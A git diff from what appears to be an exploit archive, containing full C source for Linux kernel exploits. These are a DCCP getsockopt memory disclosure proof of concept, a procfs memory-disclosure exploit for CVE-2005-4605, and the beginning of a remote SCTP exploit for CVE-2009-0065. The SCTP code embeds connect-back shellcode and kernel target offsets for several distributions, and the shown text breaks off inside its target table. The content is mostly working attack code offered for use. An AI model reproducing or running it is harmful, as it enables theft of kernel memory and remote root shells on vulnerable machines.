sizeof(int)) is always true for - `len' values less than 0. - - After that copy_to_user() procedure is called: - ------------------------ -if (put_user(len, optlen) || copy_to_user(optval, &val, len)) - return -EFAULT; ------------------------ - - What happens next depends greatly on the cpu architecture in-use - - each cpu architecture has its own copy_to_user() implementation. On - the IA-32 the code below ... - ------------------------ -unsigned long -copy_to_user(void __user *to, const void *from, unsigned long n) -{ - BUG_ON((long) n < 0); ------------------------ - - ... will prevent explotation, but kernel will oops due to - invalid opcode in BUG_ON(). - - On some other architectures (e.g. x86-64) kernel-space data will - be copied to the user supplied buffer until end-of-kernel space - (pagefault in kernel-mode occurs) is reached. 
- -POC: - ------------------------ */ - -#include -#include -#include -#include -#include -#include -#include - -#define BUFSIZE 0x10000000 - -int main(int argc, char *argv[]) -{ - void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, - MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); - if (!mem) { - printf("Cannot allocate mem\n"); - return 1; - } - /* SOCK_DCCP, IPPROTO_DCCP */ - int s = socket(PF_INET, 6, 33); - if (s == -1) { - fprintf(stderr, "socket failure!\n"); - return 1; - } - int len = -1; - /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ - int x = getsockopt(s, 269, 11, mem, &len); - - if (x == -1) - perror("SETSOCKOPT"); - else - printf("SUCCESS\n"); - - write(1, mem, BUFSIZE); - - return 0; -} - -//----------------------- -//make poc; ./poc | strings -//----------------------- - -// milw0rm.com [2007-03-27] +/* +Linux Kernel DCCP Memory Disclosure Vulnerability + +Synopsis: + + The Linux kernel is susceptible to a locally exploitable flaw + which may allow local users to steal data from the kernel memory. + +Vulnerable Systems: + + Linux Kernel Versions: >= 2.6.20 with DCCP support enabled. + Kernel versions <2.6.20 lack + DCCP_SOCKOPT_SEND_CSCOV/DCCP_SOCKOPT_RECV_CSCOV optnames for + getsockopt() call with SOL_DCCP level, which are used in the + delivered POC code. + +Author: + + Robert Swiecki + http://www.swiecki.net + robert@swiecki.net + +Details: + + The flaw exists in do_dccp_getsockopt() function in + net/dccp/proto.c file. + +----------------------- +static int do_dccp_getsockopt(struct sock *sk, int level, int optname, + char __user *optval, int __user *optlen) +... +if (get_user(len, optlen)) + return -EFAULT; +if (len < sizeof(int)) + return -EINVAL; +... +----------------------- + + The above code doesn't check `len' variable for negative values. + Because of cast typing (len < sizeof(int)) is always true for + `len' values less than 0. 
+ + After that copy_to_user() procedure is called: + +----------------------- +if (put_user(len, optlen) || copy_to_user(optval, &val, len)) + return -EFAULT; +----------------------- + + What happens next depends greatly on the cpu architecture in-use - + each cpu architecture has its own copy_to_user() implementation. On + the IA-32 the code below ... + +----------------------- +unsigned long +copy_to_user(void __user *to, const void *from, unsigned long n) +{ + BUG_ON((long) n < 0); +----------------------- + + ... will prevent explotation, but kernel will oops due to + invalid opcode in BUG_ON(). + + On some other architectures (e.g. x86-64) kernel-space data will + be copied to the user supplied buffer until end-of-kernel space + (pagefault in kernel-mode occurs) is reached. + +POC: + +----------------------- */ + +#include +#include +#include +#include +#include +#include +#include + +#define BUFSIZE 0x10000000 + +int main(int argc, char *argv[]) +{ + void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, + MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); + if (!mem) { + printf("Cannot allocate mem\n"); + return 1; + } + /* SOCK_DCCP, IPPROTO_DCCP */ + int s = socket(PF_INET, 6, 33); + if (s == -1) { + fprintf(stderr, "socket failure!\n"); + return 1; + } + int len = -1; + /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ + int x = getsockopt(s, 269, 11, mem, &len); + + if (x == -1) + perror("SETSOCKOPT"); + else + printf("SUCCESS\n"); + + write(1, mem, BUFSIZE); + + return 0; +} + +//----------------------- +//make poc; ./poc | strings +//----------------------- + +// milw0rm.com [2007-03-27] diff --git a/platforms/linux/local/9363.c b/platforms/linux/local/9363.c index e5249b54a..01dfaded8 100755 --- a/platforms/linux/local/9363.c +++ b/platforms/linux/local/9363.c 
@@ -1,197 +1,197 @@
-/*
- * cve-2005-4605.c
- *
- * Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure
- * Jon Oberheide
- * http://jon.oberheide.org
- *
- * Information:
- *
- * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4605
- *
- * The procfs code (proc_misc.c) in Linux 2.6.14.3 and other versions before
- * 2.6.15 allows attackers to read sensitive kernel memory via unspecified
- * vectors in which a signed value is added to an unsigned value.
- *
- * Usage:
- *
- * $ gcc cve-2005-4605.c -o cve-2005-4605
- * $ ./cve-2005-4605
- * [+] Opened /proc/uptime.
- * [+] Seek to offset 4294963199.
- * [+] Read 4096 bytes, dumping to stdout...
- * ...
- * ... 00 00 00 00 11 00 00 00 ................................
- * ... 3a 30 3a 72 6f 6f 74 00 localhost.......root.x.0:0:root.
- * ... 0d 00 00 00 dc 91 0f 08 /root./bin/bash.....@...........
- * ... bc af 0e 08 00 00 00 00 ............p...................
- * ...
- *
- * Notes:
- *
- * This one is _ancient_, but str0ke requested it! ;-)
- */
-
-#define _FILE_OFFSET_BITS 64
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define DUMP 4096
-#define PROC "/proc/uptime"
-
-#define TYPE_SIGNED(t) (! ((t) 0 < (t) -1))
-#define TYPE_MAX(t) ((t) (! TYPE_SIGNED (t) ? (t) -1 : ~ (~ (t) 0 << (sizeof (t) * CHAR_BIT - 1))))
-
-const char hex_asc[] = "0123456789abcdef";
-#define hex_asc_lo(x) hex_asc[((x) & 0x0f)]
-#define hex_asc_hi(x) hex_asc[((x) & 0xf0) >> 4]
-
-void
-hex_dump_to_buffer(const void *buf, size_t len, int rowsize, int groupsize, char *linebuf, size_t linebuflen, bool ascii)
-{
- const uint8_t *ptr = buf;
- uint8_t ch;
- int j, lx = 0;
- int ascii_column;
-
- if (rowsize != 16 && rowsize != 32)
- rowsize = 16;
-
- if (!len)
- goto nil;
- if (len > rowsize)
- len = rowsize;
- if ((len % groupsize) != 0)
- groupsize = 1;
-
- switch (groupsize) {
- case 8: {
- const uint64_t *ptr8 = buf;
- int ngroups = len / groupsize;
-
- for (j = 0; j < ngroups; j++)
- lx += snprintf(linebuf + lx, linebuflen - lx,
- "%16.16llx ", (unsigned long long)*(ptr8 + j));
- ascii_column = 17 * ngroups + 2;
- break;
- }
-
- case 4: {
- const uint32_t *ptr4 = buf;
- int ngroups = len / groupsize;
-
- for (j = 0; j < ngroups; j++)
- lx += snprintf(linebuf + lx, linebuflen - lx,
- "%8.8x ", *(ptr4 + j));
- ascii_column = 9 * ngroups + 2;
- break;
- }
-
- case 2: {
- const uint16_t *ptr2 = buf;
- int ngroups = len / groupsize;
-
- for (j = 0; j < ngroups; j++)
- lx += snprintf(linebuf + lx, linebuflen - lx,
- "%4.4x ", *(ptr2 + j));
- ascii_column = 5 * ngroups + 2;
- break;
- }
-
- default:
- for (j = 0; (j < rowsize) && (j < len) && (lx + 4) < linebuflen;
- j++) {
- ch = ptr[j];
- linebuf[lx++] = hex_asc_hi(ch);
- linebuf[lx++] = hex_asc_lo(ch);
- linebuf[lx++] = ' ';
- }
- ascii_column = 3 * rowsize + 2;
- break;
- }
- if (!ascii)
- goto nil;
-
- while (lx < (linebuflen - 1) && lx < (ascii_column - 1))
- linebuf[lx++] = ' ';
- for (j = 0; (j < rowsize) && (j < len) && (lx + 2) < linebuflen; j++)
- linebuf[lx++] = (isascii(ptr[j]) && isprint(ptr[j])) ? ptr[j]
- : '.';
-nil:
- linebuf[lx++] = '\0';
-}
-
-void
-print_hex_dump(int rowsize, int groupsize, const void *buf, size_t len, bool ascii)
-{
- const uint8_t *ptr = buf;
- int i, linelen, remaining = len;
- unsigned char linebuf[200];
-
- if (rowsize != 16 && rowsize != 32)
- rowsize = 16;
-
- for (i = 0; i < len; i += rowsize) {
- linelen = ((remaining) < (rowsize) ? (remaining) : (rowsize));
- remaining -= rowsize;
- hex_dump_to_buffer(ptr + i, linelen, rowsize, groupsize,
- linebuf, sizeof(linebuf), ascii);
- printf("%s\n", linebuf);
- }
-}
-
-int
-main(void)
-{
- int fd, ret;
- char buf[DUMP];
- off_t seek, offset=TYPE_MAX(off_t);
-
- memset(buf, 0, sizeof(buf));
-
- fd = open(PROC, O_RDONLY);
- if (fd == -1) {
- printf("[-] Error during open(2)\n");
- exit(1);
- }
-
- printf("[+] Opened " PROC ".\n");
-
- seek = lseek(fd, offset-DUMP, SEEK_SET);
- if (seek == -1) {
- printf("[-] Error during lseek(2).\n");
- exit(1);
- }
-
- printf("[+] Seek to offset %lld.\n", seek);
-
- ret = read(fd, buf, DUMP);
- if (ret == -1) {
- printf("[-] Error during read(2).\n");
- exit(1);
- }
-
- if (ret == 0) {
- printf("[-] read(2) return 0 bytes, your kernel may not be vulnerable.\n");
- exit(1);
- }
-
- printf("[+] Read %d bytes, dumping to stdout...\n\n", ret);
-
- sleep(3);
-
- print_hex_dump(32, 1, buf, ret, 1);
-
- return 0;
-}
-
-// milw0rm.com [2009-08-05]
+/*
+ * cve-2005-4605.c
+ *
+ * Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure
+ * Jon Oberheide
+ * http://jon.oberheide.org
+ *
+ * Information:
+ *
+ * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4605
+ *
+ * The procfs code (proc_misc.c) in Linux 2.6.14.3 and other versions before
+ * 2.6.15 allows attackers to read sensitive kernel memory via unspecified
+ * vectors in which a signed value is added to an unsigned value.
+ *
+ * Usage:
+ *
+ * $ gcc cve-2005-4605.c -o cve-2005-4605
+ * $ ./cve-2005-4605
+ * [+] Opened /proc/uptime.
+ * [+] Seek to offset 4294963199.
+ * [+] Read 4096 bytes, dumping to stdout...
+ * ...
+ * ... 00 00 00 00 11 00 00 00 ................................
+ * ... 3a 30 3a 72 6f 6f 74 00 localhost.......root.x.0:0:root.
+ * ... 0d 00 00 00 dc 91 0f 08 /root./bin/bash.....@...........
+ * ... bc af 0e 08 00 00 00 00 ............p...................
+ * ...
+ *
+ * Notes:
+ *
+ * This one is _ancient_, but str0ke requested it! ;-)
+ */
+
+#define _FILE_OFFSET_BITS 64
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define DUMP 4096
+#define PROC "/proc/uptime"
+
+#define TYPE_SIGNED(t) (! ((t) 0 < (t) -1))
+#define TYPE_MAX(t) ((t) (! TYPE_SIGNED (t) ? (t) -1 : ~ (~ (t) 0 << (sizeof (t) * CHAR_BIT - 1))))
+
+const char hex_asc[] = "0123456789abcdef";
+#define hex_asc_lo(x) hex_asc[((x) & 0x0f)]
+#define hex_asc_hi(x) hex_asc[((x) & 0xf0) >> 4]
+
+void
+hex_dump_to_buffer(const void *buf, size_t len, int rowsize, int groupsize, char *linebuf, size_t linebuflen, bool ascii)
+{
+ const uint8_t *ptr = buf;
+ uint8_t ch;
+ int j, lx = 0;
+ int ascii_column;
+
+ if (rowsize != 16 && rowsize != 32)
+ rowsize = 16;
+
+ if (!len)
+ goto nil;
+ if (len > rowsize)
+ len = rowsize;
+ if ((len % groupsize) != 0)
+ groupsize = 1;
+
+ switch (groupsize) {
+ case 8: {
+ const uint64_t *ptr8 = buf;
+ int ngroups = len / groupsize;
+
+ for (j = 0; j < ngroups; j++)
+ lx += snprintf(linebuf + lx, linebuflen - lx,
+ "%16.16llx ", (unsigned long long)*(ptr8 + j));
+ ascii_column = 17 * ngroups + 2;
+ break;
+ }
+
+ case 4: {
+ const uint32_t *ptr4 = buf;
+ int ngroups = len / groupsize;
+
+ for (j = 0; j < ngroups; j++)
+ lx += snprintf(linebuf + lx, linebuflen - lx,
+ "%8.8x ", *(ptr4 + j));
+ ascii_column = 9 * ngroups + 2;
+ break;
+ }
+
+ case 2: {
+ const uint16_t *ptr2 = buf;
+ int ngroups = len / groupsize;
+
+ for (j = 0; j < ngroups; j++)
+ lx += snprintf(linebuf + lx, linebuflen - lx,
+ "%4.4x ", *(ptr2 + j));
+ ascii_column = 5 * ngroups + 2;
+ break;
+ }
+
+ default:
+ for (j = 0; (j < rowsize) && (j < len) && (lx + 4) < linebuflen;
+ j++) {
+ ch = ptr[j];
+ linebuf[lx++] = hex_asc_hi(ch);
+ linebuf[lx++] = hex_asc_lo(ch);
+ linebuf[lx++] = ' ';
+ }
+ ascii_column = 3 * rowsize + 2;
+ break;
+ }
+ if (!ascii)
+ goto nil;
+
+ while (lx < (linebuflen - 1) && lx < (ascii_column - 1))
+ linebuf[lx++] = ' ';
+ for (j = 0; (j < rowsize) && (j < len) && (lx + 2) < linebuflen; j++)
+ linebuf[lx++] = (isascii(ptr[j]) && isprint(ptr[j])) ? ptr[j]
+ : '.';
+nil:
+ linebuf[lx++] = '\0';
+}
+
+void
+print_hex_dump(int rowsize, int groupsize, const void *buf, size_t len, bool ascii)
+{
+ const uint8_t *ptr = buf;
+ int i, linelen, remaining = len;
+ unsigned char linebuf[200];
+
+ if (rowsize != 16 && rowsize != 32)
+ rowsize = 16;
+
+ for (i = 0; i < len; i += rowsize) {
+ linelen = ((remaining) < (rowsize) ? (remaining) : (rowsize));
+ remaining -= rowsize;
+ hex_dump_to_buffer(ptr + i, linelen, rowsize, groupsize,
+ linebuf, sizeof(linebuf), ascii);
+ printf("%s\n", linebuf);
+ }
+}
+
+int
+main(void)
+{
+ int fd, ret;
+ char buf[DUMP];
+ off_t seek, offset=TYPE_MAX(off_t);
+
+ memset(buf, 0, sizeof(buf));
+
+ fd = open(PROC, O_RDONLY);
+ if (fd == -1) {
+ printf("[-] Error during open(2)\n");
+ exit(1);
+ }
+
+ printf("[+] Opened " PROC ".\n");
+
+ seek = lseek(fd, offset-DUMP, SEEK_SET);
+ if (seek == -1) {
+ printf("[-] Error during lseek(2).\n");
+ exit(1);
+ }
+
+ printf("[+] Seek to offset %lld.\n", seek);
+
+ ret = read(fd, buf, DUMP);
+ if (ret == -1) {
+ printf("[-] Error during read(2).\n");
+ exit(1);
+ }
+
+ if (ret == 0) {
+ printf("[-] read(2) return 0 bytes, your kernel may not be vulnerable.\n");
+ exit(1);
+ }
+
+ printf("[+] Read %d bytes, dumping to stdout...\n\n", ret);
+
+ sleep(3);
+
+ print_hex_dump(32, 1, buf, ret, 1);
+
+ return 0;
+}
+
+// milw0rm.com [2009-08-05]
diff --git a/platforms/linux/remote/8556.c b/platforms/linux/remote/8556.c
index f8c3bb315..074e96585 100755
--- a/platforms/linux/remote/8556.c
+++ b/platforms/linux/remote/8556.c
@@ -1,1116 +1,1116 @@
-/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption
- * Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
- *
- * coded by: sgrakkyu antifork.org
- * http://kernelbof.blogspot.com
- *
- *
- * NOTE: you need at least one sctp application bound on the target box
- *
- * Supported target:
- * Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server)
- * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
- * Ubuntu 8.10 x86_64 (2.6.27_7-10 geenric/server)
- * Fedora Core 10 x86_64 (default installed kernel)
- * OpenSuse 11.1 x86_64 (default installed kernel)
- */
-
-
-
-
-#define _GNU_SOURCE
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define __OFFSET_PORT_64 62 // 92
-#define __OFFSET_HOST_64 64 // 94
-
-//#define __TARGET_SPORT 20000
-
-
-#ifndef __u8
-#define __u8 uint8_t
-#endif
-
-#ifndef __u16
-#define __u16 uint16_t
-#endif
-
-#ifndef __u32
-#define __u32 uint32_t
-#endif
-
-
-
-/* start crc routines: ripped from wireshark sources */
-#define SP_LEN 2
-#define DP_LEN 2
-#define VTAG_LEN 4
-#define CHK_LEN 4
-#define HEADER_LEN (SP_LEN + DP_LEN + VTAG_LEN + CHK_LEN)
-
-
-#define CRC32C(c,d) (c=(c>>8)^crc_c[(c^(d))&0xFF])
-static int32_t crc_c[256] =
-{
-0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L,
-0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 0xD4CA64EBL,
-0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL,
-0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L,
-0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL,
-0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L,
-0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L,
-0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL,
-0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL,
-0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L,
-0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L,
-0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL,
-0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L,
-0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL,
-0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL,
-0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L,
-0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L,
-0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L,
-0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L,
-0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L,
-0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L,
-0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L,
-0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L,
-0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L,
-0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L,
-0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L,
-0xEB1FCBADL, 0x197448AEL, 0x0A24BB5AL, 0xF84F3859L,
-0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L,
-0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L,
-0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L,
-0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L,
-0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L,
-0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL,
-0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L,
-0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L,
-0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL,
-0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L,
-0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL,
-0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL,
-0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L,
-0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L,
-0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL,
-0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL,
-0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L,
-0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL,
-0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L,
-0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L,
-0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL,
-0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L,
-0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL,
-0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL,
-0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L,
-0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL,
-0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L,
-0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L,
-0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL,
-0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL,
-0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L,
-0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L,
-0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL,
-0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L,
-0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL,
-0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL,
-0xBE2DA0A5L, 0x4C4623A6L, 0x5F16D052L, 0xAD7D5351L,
-};
-
-static __u32 sctp_crc32c(const unsigned char* buf, __u32 len)
-{
- __u32 i;
- __u32 crc32 = ~0U;
- __u32 r;
- unsigned char b0,b1,b2,b3;
-
- for (i = 0; i < SP_LEN + DP_LEN + VTAG_LEN; i++)
- {
- CRC32C(crc32, buf[i]);
- }
- CRC32C(crc32, 0);
- CRC32C(crc32, 0);
- CRC32C(crc32, 0);
- CRC32C(crc32, 0);
- for (i = HEADER_LEN; i < len; i++)
- {
- CRC32C(crc32, buf[i]);
- }
- r = ~crc32;
-
- b0 = r & 0xff;
- b1 = (r>>8) & 0xff;
- b2 = (r>>16) & 0xff;
- b3 = (r>>24) & 0xff;
- crc32 = ((b0 << 24) | (b1 << 16) | (b2 << 8) | b3);
- return ( crc32 );
-}
-/* end crc routines */
-
-static char generic_x86_64_shellcode[] =
-// prolog
-"\x90\x53\x48\x31\xc0\xb0\x66\x0f\x05\x48\x31\xdb"
-"\x48\x39\xd8\x75\x0f\x48\x31\xc0\xb0\x02\xcd\x80"
-"\x48\x31\xdb\x48\x39\xc3\x74\x09\x5b\x48\x31\xc0"
-"\xb0\x60\x0f\x05\xc3"
-// connect back
-"\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58"
-"\x0f\x05\x48\x97\x50\x48\xb9\x02\x00\x0d\x05\x7f"
-"\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a"
-"\x58\x0f\x05\x48\x31\xdb\x48\x39\xc3\x74\x07\x48"
-"\x31\xc0\xb0\xe7\x0f\x05\x90"
-"\x6a\x03\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\x75"
-"\xf6\x48\xbb\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48"
-"\xf7\xd3\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48"
-"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\x48\x31\xc0"
-"\xb0\xe7\x0f\x05"
-;
-
-static const char __zero[4] = {0x00, 0x00, 0x00, 0x00};
-//static char __force_crash[] = "\x41\x41\x41\x41\x41\x41\x41\x41";
-
-static char generic_x86_64_patchjump[] = "\x48\x31\xc0\xb0\x60\x0f\x05\xc3";
-static char generic_x86_64_jump[] = "\xe9\x2b\x09\x00\x00\x90";
-
-/* ubuntu 7.04 */
-static char ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow[] = "\x00\x40\x56\x80\xFF\xFF\xFF\xFF";
-static char ubuntu64_2_6_20_17_server_x86_64_vsys_shadow[] = "\x00\x90\x5B\x80\xFF\xFF\xFF\xFF";
-
-/* ubuntu 8.04 */
-static char ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow[] = "\x00\x50\x62\x80\xFF\xFF\xFF\xFF";
-static char ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow[] = "\x00\x40\x62\x80\xFF\xFF\xFF\xFF";
-static char ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow[] = "\x00\x30\x62\x80\xFF\xFF\xFF\xFF";
-
-static char ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow[] = "\x00\x40\x5d\x80\xFF\xFF\xFF\xFF";
-
-/* ubuntu 8.10 */
-static char ubuntu64_2_6_27_7_server_x86_64_vsys_shadow[] = "\x00\x30\x6f\x80\xFF\xFF\xFF\xFF";
-static char ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow[] = "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF";
-
-static char ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow[] = "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF";
-
-/* fedora code 10 */
-static char fedora64_10_default_kernel_x86_64_vsys_shadow[] = "\x00\x10\x57\x81\xFF\xFF\xFF\xFF";
-static char fedora64_10_default_kernel_x86_64_selinux[] = "\x84\xE6\x7C\x81\xFF\xFF\xFF\xFF";
-
-/* opensuse 11.1 */
-static char opensuse64_11_1_default_kernel_x86_64_vsys_shadow[]="\x00\x10\x8E\x80\xFF\xFF\xFF\xFF";
-
-
-#define __msg_f(format, args...) \
- do { fprintf(stdout, format, ## args); } while(0)
-
-#define __msg(msg) \
- do { fprintf(stdout, "%s", msg); } while(0)
-
-#define __fatal(msg) \
- do {fprintf(stderr, "%s", msg); exit(1);} while (0)
-
-#define __fatal_perror(msg) \
- do { perror(msg); exit(1); } while (0)
-
-enum {
- SLAB_ALLOCATOR=0,
- SLUB_ALLOCATOR=1
-};
-
-typedef struct
-{
- const char *name;
- const char *info;
- char *scode;
- __u32 scodesize;
- __u32 portoff;
- __u32 hostoff;
- const char *vsysaddr;
- const char *vsysjump;
- __u32 vsysjumpsize;
-
- const char *vsyspatchjump;
- __u32 vsyspatchjumpsize;
-
- __u32 chunksize;
- __u32 slubsize;
- __u32 ptrsize;
-
- const char *selinux;
-
- int allocator_type;
-
-} kinfo;
-
-static kinfo *k;
-
-typedef struct
-{
- const char* target;
- const char* rhost;
- const char* lhost;
- __u16 rport;
- __u16 lport;
-
- __u16 sport; // defines associations
- __u16 nconn;
-
-} hinfo;
-
-static hinfo h = { NULL, NULL, NULL, 0, 0, 0, 600 };
-
-static kinfo kernels[] = {
- {
- "ubuntu64_faisty-2.6.20-[15-17]-generic",
- "(faisty: generic kernel)",
- generic_x86_64_shellcode,
- sizeof(generic_x86_64_shellcode) -1,
- __OFFSET_PORT_64,
- __OFFSET_HOST_64,
- ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow,
- generic_x86_64_jump,
- 6,
- generic_x86_64_patchjump,
- 8,
- 40,
- 256,
- 8,
- NULL,
- SLAB_ALLOCATOR
- },
- {
- "ubuntu64_faisty-2.6.20-17-server",
- "(faisty: server kernel - last 2.6.20-17 build)",
- generic_x86_64_shellcode,
- sizeof(generic_x86_64_shellcode) -1,
- __OFFSET_PORT_64,
- __OFFSET_HOST_64,
- ubuntu64_2_6_20_17_server_x86_64_vsys_shadow,
- generic_x86_64_jump,
- 6,
- generic_x86_64_patchjump,
- 8,
- 40,
- 256,
- 8,
- NULL,
- SLAB_ALLOCATOR
- },
- {
- "ubuntu64_hardy-2.6.24-[18-21]-generic",
- "(kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)",
- generic_x86_64_shellcode,
- sizeof(generic_x86_64_shellcode) -1,
- __OFFSET_PORT_64,
- __OFFSET_HOST_64,
- ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow,
- generic_x86_64_jump,
- 6,
- generic_x86_64_patchjump,
- 8,
- 40,
- 96,
- 8,
- NULL,
- SLUB_ALLOCATOR
- },
- {
- "ubuntu64_hardy_2.6.24-[16-18]-server",
- "(kernel from 2.6.24-16 to 2.6.24-18 -- server)",
- generic_x86_64_shellcode,
- sizeof(generic_x86_64_shellcode) -1,
- __OFFSET_PORT_64,
- __OFFSET_HOST_64,
- ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow,
- generic_x86_64_jump,
- 6,
- generic_x86_64_patchjump,
- 8,
- 40,
- 96,
- 8,
- NULL,
- SLUB_ALLOCATOR
- },
- {
- "ubuntu64_hardy-2.6.24-[19-22]-server",
- "(kernel from 2.6.24-19 to 2.6.24-22 -- server)",
- generic_x86_64_shellcode,
- sizeof(generic_x86_64_shellcode) -1,
- __OFFSET_PORT_64,
- __OFFSET_HOST_64,
- ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow,
- generic_x86_64_jump,
- 6,
- generic_x86_64_patchjump,
- 8,
- 40,
- 96,
- 8,
- NULL,
- SLUB_ALLOCATOR
- },
- {
- "ubuntu64_hardy-2.6.24-23-last-server",
- "(last 2.6.24-23 kernel before patch -- server)",
- generic_x86_64_shellcode,
- sizeof(generic_x86_64_shellcode) -1,
- __OFFSET_PORT_64,
- __OFFSET_HOST_64,
- ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow,
- generic_x86_64_jump,
- 6,
- generic_x86_64_patchjump,
- 8,
- 40,
- 96,
- 8,
- NULL,
- SLUB_ALLOCATOR
- },
- {
- "ubuntu64_intrepid-2.6.27-7-server",
- "(kernel 2.6.27-7 -- server)",
